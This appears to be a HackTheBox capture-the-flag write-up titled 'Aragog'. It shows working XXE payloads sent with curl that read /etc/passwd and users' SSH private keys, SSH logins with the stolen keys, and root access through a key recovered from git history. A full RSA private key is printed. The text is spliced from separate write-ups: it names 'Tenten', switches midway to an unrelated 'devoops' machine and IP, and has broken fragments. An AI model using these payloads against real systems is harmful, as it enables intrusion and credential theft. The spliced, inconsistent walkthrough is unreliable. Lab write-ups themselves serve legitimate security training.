Aragog

#Linux #Web #Wordpress #XXE

Tenten is an medium-rated Linux machine from HackTheBox created by egre55. In the current post, my IP is 10.10.14.76, and the target’s IP is 10.129.102.78

Recon

Local Terminal

> ping -c 1 10.129.102.78

PING 10.129.102.78 (10.129.102.78) 56(84) bytes of data.
64 bytes from 10.129.102.78: icmp_seq=1 ttl=63 time=260 ms

--- 10.129.102.78 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 260.032/260.032/260.032/0.000 ms

The machine is alive, and by the TTL (close but no more than 64), it is possible to think that the target is a Linux Machine.

Local Terminal

nmap -p- --open -sS --min-rate 5000 -Pn -n -vvv 10.129.102.78 -oN AllPorts

Nmap scan report for 10.129.102.78
Host is up, received user-set (0.26s latency).
Scanned at 2023-09-14 11:22:03 -03 for 21s
Not shown: 65487 closed ports, 45 filtered ports
Reason: 65487 resets and 45 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 62
22/tcp open  ssh     syn-ack ttl 62
80/tcp open  http    syn-ack ttl 62

Local Terminal

nmap -sCV -p 21,22,80 10.129.102.78 -oN Target

nmap -sCV -p 21,22,80 10.129.102.78 -oN Target
Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-14 11:22 -03
Nmap scan report for 10.129.102.78
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.76
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://aragog.htb/
Service Info: Host: aragog.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

There are two open ports. First the port 22 with ssh, if you search about "OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 launchpad", we can see that the target is an "Ubuntu Xenial". And about the port 80, the web page, if you search "Apache httpd 2.4.18 launchpad", it confirms that is an Ubuntu Xenial.

Both are the same, so there is a significant reduced chance to find a Docker Container here.

The port 80 have a redirect, add the IP to the /etc/hosts and launch another nmap scan.

Port 21 - FTP

Local Terminal

> ftp 10.129.102.78
Connected to 10.129.102.78.
220 (vsFTPd 3.0.3)
Name (10.129.102.78:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> dir
229 Entering Extended Passive Mode (|||46497|)
150 Here comes the directory listing.
-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.

ftp> get test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||46086|)
150 Opening BINARY mode data connection for test.txt (86 bytes).
100% |*********************************************************************************************************|    86      237.91 KiB/s    00:00 ETA
226 Transfer complete.
86 bytes received in 00:00 (0.33 KiB/s)

ftp> exit
221 Goodbye.

> cat test.txt
<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

Looks like an XML file with custom labels.

Port 80

> whatweb http://aragog.htb
http://aragog.htb [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.102.78], 
Title[Apache2 Ubuntu Default Page: It works]

Nothing from whatweb, but now we know that has an Ubuntu Default Page

http://aragog.htb/

Stuck, there is nothing to do, so let's try a fuzzing process with html and php.

Local Terminal

wfuzz -c --hc=404 --hw=28 -t 200 -w /opt/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt -z list,php-html http://aragog.htb/FUZZ.FUZ2Z

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://aragog.htb/FUZZ.FUZ2Z
Total requests: 441092

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000002:   200        375 L    968 W      11321 Ch    "index - html"
000012013:   200        3 L      6 W        46 Ch       "hosts - php"

http://aragog.htb/hosts.php

It's fixed, maybe it's related to the other file found, test.txt. There is a way to send files with POST, of course.

Local Terminal

> curl -s -X POST -d @test.txt http://aragog.htb/hosts.php

There are 62 possible hosts for 255.255.255.192

It reacts, let's see if we can see the output from an XXE.

exploit.txt

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>

Local Terminal

> curl -s -X POST -d @exploit.txt http://aragog.htb/hosts.php

There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
<...>
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
florian:x:1000:1000:florian,,,:/home/florian:/bin/bash
cliff:x:1001:1001::/home/cliff:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
<...>

And it works!! Additionally from the /etc/passwd we make a successful user enumeration, by searching who has /bin/bash available.

[+] root + florian + cliff

Or you can use:

curl -s -X POST -d @test.txt http://aragog.htb/hosts.php | grep "sh$"

Exploitation

First, let's see the code of the current php file.

exploit_two.txt

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/florian/.ssh/id_rsa"> ]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>

Local Terminal

curl -s -X POST -d @exploit_two.txt http://aragog.htb/hosts.php

Output

Reverse Shell

Local Terminal

> chmod 600 id_rsa
> ssh -i id_rsa florian@10.129.102.78

florian@aragog:~$ whoami
florian
florian@aragog:~$ cat user.txt

It works!

Privileges Escalation

Target Terminal [florian]

florian@aragog:~$ id
uid=1000(florian) gid=1000(florian) groups=1000(florian)

florian@aragog:~$ cd /
florian@aragog:/$ find \-perm -4000 2>/dev/null
./bin/su
./bin/mount
<...>

florian@aragog:/$ getcap -r / 2>/dev/null
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep

florian@aragog:/$  cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

There is nothing around here, let's try with pspy or with procmon at /tmp.

procmon.sh

#!/bin/bash

function ctrl_c(){
	echo -e "\n[!] Exit [!]\n"
	exit 1
}

# Ctrl+C
trap ctrl_c INT

old_process=$(ps -eo command)

while true; do
	new_process=$(ps -eo command)
	diff <(echo "$old_process")<(echo "$new_process") | grep "[\>\<]" | grep -vE "procmon|command|kworker"
	old_processs=$new_process
done

Local Terminal

> curl -s -X POST -d @exploit.txt http://aragog.htb/hosts.php

There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
<...>

Local Terminal

> curl -s -X POST -d @test.txt http://aragog.htb/hosts.php

There are 62 possible hosts for 255.255.255.192

It e.

Local Terminal

> curl -s -X POST -d @test.txt http://aragog.htb/hosts.php

There are 62 possible hosts for 255.255.255.192

http://10.129.102.140:5000/feed
- Just an image
http://10.129.102.140:5000/upload
- Place to upload files, with XML elements, interesting.

First, upload an empty file to see how it reacts, with vi test.xml, the create the proper XML, with vi exploit.xml

test.xml

Testing

exploit.xml

<elements>
        <Author>Tartox</Author>
        <Subject>String</Subject>
        <Content>Stringtwo</Content>
</elements>

From here we got a lot of information. First, the output is visible, this means that is possible to execute an XXE, and second, there is an user called "roosa" at the system.

Exploitation

Let's see if the exploits works, creating a file with vi exploit_proof.xml, then upload it.

exploit_proof.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<elements>
	<Author>Tartox</Author>
	<Subject>&xxe;</Subject>
	<Content>String</Content>
</elements>

Perfect, it works, remember that with Ctrl+U (view:source) you can see in a better format the targeted file.

Now, time to exploit, upload exploit_exec.xml.

exploit_exec.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa"> ]>
<elements>
	<Author>Tartox</Author>
	<Subject>&xxe;</Subject>
	<Content>String</Content>
</elements>

In many machines, this exploits fails, an alternative to these situation, because the target use php, is the use of wrappers, like "php://filter/convert.base64-encode/resource=/var/www/html/index.php" after SYSTEM.

Reverse Shell - roosa

Perfect, we can read the id_rsa.

id_rsa

Local Terminal

> chmod 600 id_rsa
> ssh -i id_rsa roosa@10.129.102.140

See the content of the "Cross-Site Scripting" exploit, it's the version 4.1.0, it should be that.

Target Terminal [roosa]

roosa@devoops:~$ whoami
roosa
roosa@devoops:~$ cat user.txt
2d8b779192e11e67d6d8f2039338a37f

Privileges Escalation

Target Terminal [roosa]

roosa@devoops:~$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
# group (adm), you can see the system's log with > ls -l /var/log 

roosa@devoops:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.4 LTS
Release:        16.04
Codename:       xenial #Nice

roosa@devoops:~$ ls -la
total 156
<...>
drwx------  3 root  root  4096 Mar 26  2021 .dbus
drwxrwxr-x  4 roosa roosa 4096 Mar 26  2021 deploy
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Desktop
-rw-r--r--  1 roosa roosa   25 Mar 21  2018 .dmrc
<...>
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Templates
-r--------  1 roosa roosa   33 Sep 13 15:04 user.txt
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Videos
drwxrwxr-x  3 roosa roosa 4096 Mar 26  2021 work
<...>

A lot of files, but there are two curious folder, deploy and work. Let's check work.

Target Terminal [roosa]

roosa@devoops:~$ cd work
roosa@devoops:~/work$ ls -la
total 12
drwxrwxr-x  3 roosa roosa 4096 Mar 26  2021 .
drwxr-xr-x 22 roosa roosa 4096 Sep 23  2022 ..
drwxrwx---  5 roosa roosa 4096 Mar 26  2021 blogfeed

roosa@devoops:~/work$ cd blogfeed
roosa@devoops:~/work/blogfeed$ ls -la
total 28
drwxrwx--- 5 roosa roosa 4096 Mar 26  2021 .
drwxrwxr-x 3 roosa roosa 4096 Mar 26  2021 ..
drwxrwx--- 8 roosa roosa 4096 Mar 26  2021 .git
-rw-rw---- 1 roosa roosa  104 Mar 19  2018 README.md
drwxrwx--- 3 roosa roosa 4096 Mar 26  2021 resources
-rwxrw-r-- 1 roosa roosa  180 Mar 21  2018 run-gunicorn.sh
drwxrwx--- 2 roosa roosa 4096 Mar 26  2021 src

Good, there is git, in those cases is always a good practice to see the commits for old relevant information... ALWAYS! But first, let's see if there is another hidden file here.

Target Terminal [roosa]

roosa@devoops:~/work/blogfeed$ find .
.
./run-gunicorn.sh
./resources
./resources/integration
./resources/integration/authcredentials.key
./.git
./.git/objects
./.git/objects/33
./.git/objects/33/e87c312c08735a02fa9c796021a4a3023129ad
<...>

A file with credentials?

Target Terminal [roosa]

roosa@devoops:~/work/blogfeed$ cat ./resources/integration/authcredentials.key
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEApc7idlMQHM4QDf2d8MFjIW40UickQx/cvxPZX0XunSLD8veN
ouroJLw0Qtfh+dS6y+rbHnj4+HySF1HCAWs53MYS7m67bCZh9Bj21+E4fz/uwDSE
23g18kmkjmzWQ2AjDeC0EyWH3k4iRnABruBHs8+fssjW5sSxze74d7Ez3uOI9zPE
sQ26ynmLutnd/MpyxFjCigP02McCBrNLaclcbEgBgEn9v+KBtUkfgMgt5CNLfV8s
ukQs4gdHPeSj7kDpgHkRyCt+YAqvs3XkrgMDh3qI9tCPfs8jHUvuRHyGdMnqzI16
ZBlx4UG0bdxtoE8DLjfoJuWGfCF/dTAFLHK3mwIDAQABAoIBADelrnV9vRudwN+h
LZ++l7GBlge4YUAx8lkipUKHauTL5S2nDZ8O7ahejb+dSpcZYTPM94tLmGt1C2bO
JqlpPjstMu9YtIhAfYF522ZqjRaP82YIekpaFujg9FxkhKiKHFms/2KppubiHDi9
oKL7XLUpSnSrWQyMGQx/Vl59V2ZHNsBxptZ+qQYavc7bGP3h4HoRurrPiVlmPwXM
xL8NWx4knCZEC+YId8cAqyJ2EC4RoAr7tQ3xb46jC24Gc/YFkI9b7WCKpFgiszhw
vFvkYQDuIvzsIyunqe3YR0v8TKEfWKtm8T9iyb2yXTa+b/U3I9We1P+0nbfjYX8x
6umhQuECgYEA0fvp8m2KKJkkigDCsaCpP5dWPijukHV+CLBldcmrvUxRTIa8o4e+
OWOMW1JPEtDTj7kDpikekvHBPACBd5fYnqYnxPv+6pfyh3H5SuLhu9PPA36MjRyE
4+tDgPvXsfQqAKLF3crG9yKVUqw2G8FFo7dqLp3cDxCs5sk6Gq/lAesCgYEAyiS0
937GI+GDtBZ4bjylz4L5IHO55WI7CYPKrgUeKqi8ovKLDsBEboBbqRWcHr182E94
SQMoKu++K1nbly2YS+mv4bOanSFdc6bT/SAHKdImo8buqM0IhrYTNvArN/Puv4VT
Nszh8L9BDEc/DOQQQzsKiwIHab/rKJHZeA6cBRECgYEAgLg6CwAXBxgJjAc3Uge4
eGDe3y/cPfWoEs9/AptjiaD03UJi9KPLegaKDZkBG/mjFqFFmV/vfAhyecOdmaAd
i/Mywc/vzgLjCyBUvxEhazBF4FB8/CuVUtnvAWxgJpgT/1vIi1M4cFpkys8CRDVP
6TIQBw+BzEJemwKTebSFX40CgYEAtZt61iwYWV4fFCln8yobka5KoeQ2rCWvgqHb
8rH4Yz0LlJ2xXwRPtrMtJmCazWdSBYiIOZhTexe+03W8ejrla7Y8ZNsWWnsCWYgV
RoGCzgjW3Cc6fX8PXO+xnZbyTSejZH+kvkQd7Uv2ZdCQjcVL8wrVMwQUouZgoCdA
qML/WvECgYEAyNoevgP+tJqDtrxGmLK2hwuoY11ZIgxHUj9YkikwuZQOmFk3EffI
T3Sd/6nWVzi1FO16KjhRGrqwb6BCDxeyxG508hHzikoWyMN0AA2st8a8YS6jiOog
bU34EzQLp7oRU/TKO6Mx5ibQxkZPIHfgA1+Qsu27yIwlprQ64+oeEr0=
-----END RSA PRIVATE KEY-----

Another id_rsa, go to home to check for more users.

Another way to see the user list with bash, is by reading the /etc/passwd file and check who has the "bash" available.

Target Terminal [roosa]

roosa@devoops:~/work/blogfeed$ cd /home

roosa@devoops:/home$ ls -la
total 28
drwxr-xr-x  7 root     root     4096 Mar 26  2021 .
drwxr-xr-x 23 root     root     4096 Sep 23  2022 ..
drwxr-xr-x  2 blogfeed blogfeed 4096 Mar 26  2021 blogfeed
drwxr-xr-x  4 git      git      4096 Sep 23  2022 git
drwx------  2 root     root     4096 Mar 26  2021 lost+found
drwxr-xr-x 16 osboxes  osboxes  4096 Mar 26  2021 osboxes
drwxr-xr-x 22 roosa    roosa    4096 Sep 23  2022 roosa

Many user to test the id_rsa, if is not the correct one, we should check the past-commits for mistakes.

Copy the authcredentials.keys as id_rsa to the tmp folder, then connect through ssh.

Target Terminal [roosa]

roosa@devoops:/home$ cd /tmp
roosa@devoops:/tmp$ cp /home/roosa/work/blogfeed/resources/integration/authcredentials.key /tmp/id_rsa
roosa@devoops:/tmp$ chmod 600 id_rsa
roosa@devoops:/tmp$ ssh -i id_rsa root@localhost
    # It requires password with every user, forget about it.

Return to the blogfeed folder with cd /home/roosa/work/blogfeed

Target Terminal [roosa]

roosa@devoops:~/work/blogfeed$ git log

"reverted accidental commit with proper key" looks like an interesting mistake, copy the commit code.

Target Terminal [roosa]

roosa@devoops:~/work/blogfeed$ git log -p 33e87c312c08735a02fa9c796021a4a3023129ad

It shows a deleted id_rsa, copy the red one at /tmp and try to use it.

id_rsa_two

Target Terminal [roosa]

roosa@devoops:/tmp$ chmod 600 id_rsa_two
roosa@devoops:/tmp$ ssh -i id_rsa_two root@localhost
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Fri Sep 23 09:46:30 2022
root@devoops:~# cat root.txt

And it works, the machine is done.

PreviousMedium Machine NextBitlab

Last updated 2 years ago

hashtagRecon

hashtagPort 21 - FTP

hashtagPort 80

hashtagExploitation

hashtagReverse Shell

hashtagPrivileges Escalation

hashtagExploitation

hashtagReverse Shell - roosa

hashtagPrivileges Escalation

Recon

Port 21 - FTP

Port 80

Exploitation

Reverse Shell

Privileges Escalation

Exploitation

Reverse Shell - roosa

Privileges Escalation